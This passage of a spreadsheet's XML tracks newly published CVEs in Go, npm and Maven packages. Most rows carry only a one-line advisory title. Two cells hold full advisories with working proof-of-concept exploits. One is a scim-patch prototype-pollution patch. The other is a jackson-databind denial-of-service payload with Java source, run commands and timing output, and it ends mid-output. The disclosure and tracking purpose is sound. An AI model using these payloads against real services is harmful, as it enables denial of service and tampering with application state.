        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr"/>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Hatchet - Unauthenticated OAuth state CSRF / login-CSRF via empty-state collision in ValidateOAuthState in hatchet in github.com/hatchet-dev/hatchet.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github.com/hatchet-dev/hatchet before v0.91.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61687</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="inlineStr"/>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr"/>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>OpenFGA: ListUsers returns a deliberately-excluded user when a `but not` exclusion under a type-bound wildcard is intersected (`and`) with another relation that also grants that user in github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61794</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="inlineStr"/>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr"/>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Capsule: Malformed ForbiddenAnnotations.Regex can bypass Tenant validation and trigger namespace admission panic in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61794</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61795</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="inlineStr"/>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr"/>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Capsule: hostnameRegexHandler.OnUpdate validates stale (old) Tenant regex, allowing invalid AllowedHostnames regex to bypass webhook validation in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61795</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61833</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="inlineStr"/>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>Go:zotregistry.dev/zot, Go:zotregistry.dev/zot/v2</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>2.1.18</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr"/>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>zot: Bearer authentication maps DELETE to push scope, allowing unauthorized deletion in zotregistry.dev/zot</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61833</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61834</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>npm:scim-patch</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>0.9.2</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr"/>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>## Summary
Incomplete Prototype Pollution Fix Allows Mutation of Inherited Built-in Method Objects
`scim-patch` blocks direct dangerous path segments such as `__proto__`, `constructor`, and `prototype`, but still traverses inherited properties when applying SCIM patch paths.
An attacker who controls a SCIM PATCH operation can use paths such as `toString.polluted` to mutate shared built-in function objects, for example `Object.prototype.toString`.
## Impact
A malicious patch can add attacker-controlled properties to inherited built-in method objects. The impact is narrower than direct `Object.prototype` pollution, but the mutation is process-global and may affect application logic that reads properties from inherited methods.
## Details
Affected code paths:
- `navigate()` reads inherited properties via `schema[subPath]`
- `assign()` uses `key in obj`, which treats inherited properties as existing
Because inherited keys are followed, safe-looking path segments such as `toString` can resolve to shared built-in objects.
## PoC
```js
const assert = require("node:assert/strict");
const { scimPatch } = require("./lib/src/scimPatch");
const victim = {
  schemas: ["urn:ietf:params:scim:schemas:core:2.0:User"],
  userName: "alice",
  active: true,
  emails: [{ value: "alice@example.com", primary: true }],
  meta: { created: "x", lastModified: "x", resourceType: "User" }
};
try {
  assert.equal(({}).toString.scimPatchPolluted, undefined);
  scimPatch(victim, [
    { op: "add", path: "toString.scimPatchPolluted", value: "polluted" }
  ]);
  assert.equal(({}).toString.scimPatchPolluted, "polluted");
  console.log(({}).toString.scimPatchPolluted);
} finally {
  delete Object.prototype.toString.scimPatchPolluted;
}
```
Output:
```text
polluted
```
A no-path operation with a dotted value key is also affected:
```js
scimPatch(victim, [
  { op: "add", value: { "toString.noPathPolluted": "polluted" } }
]);
```
## Remediation
Do not traverse inherited properties while resolving patch paths. Use own-property checks such as `Object.hasOwn(obj, key)` and create missing containers only for safe own keys.
Keep the existing denylist for `__proto__`, `constructor`, and `prototype` as defense in depth.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61834</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63199</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr"/>
      <c r="F29" s="5" t="inlineStr"/>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr"/>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Perses's missing authorization in datasource proxy allows cross-scope secret disclosure in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63199</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63405</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="inlineStr"/>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr"/>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Pusher REST API Does Not Verify Request Body MD5 Enabling Signed-Request Replay with Arbitrary Body in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63405</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63406</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="inlineStr"/>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr"/>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Telemetry Subsystem Contains Hardcoded Authentication Token and Transmits CLI Arguments Including Secrets in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63406</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63445</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr"/>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Perses's unvalidated project parameter enables filesystem path traversal in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63445</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63458</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>0.54.0-beta.3</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr"/>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Perses's project query parameter authorization bypass exposes cross-project resources in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63458</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6673</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr"/>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't authenticate Atlassian Connect installed callbacks, allowing a remote unauthenticated attacker to inject a rogue sharedSecret in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6673</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr"/>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>### Summary
`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.
### Details
`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.
`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:
```java
protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}
```
Per the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `"P" + "9"×N + "Y"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`
  — `newDuration(value)` (TYPE_DURATION)
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`
  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)
- Registration (default, no opt-in):
  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`
  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)
- Contrast — correct length-guard pattern already used elsewhere in the library:
  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`
## Proof of Concept
PoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only "special" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}
```
Minimal HTTP-shaped payload (what an attacker sends):
```json
{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000
```
An `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.
`{ "at": "0000-01-01T00:00:00." + "9"×N }`.
## Execution Steps
The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).
```bash
# 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
#   If not already cached, fetch them once, e.g.:
#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
# 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
# 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
```
The `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.
Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.
## Reproduction Evidence
Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:
**digits = 5,000,000 (~5 MB payload):**
```
Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
**digits = 1,000,000 (~1 MB payload, for fast repeatability):**
```
Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
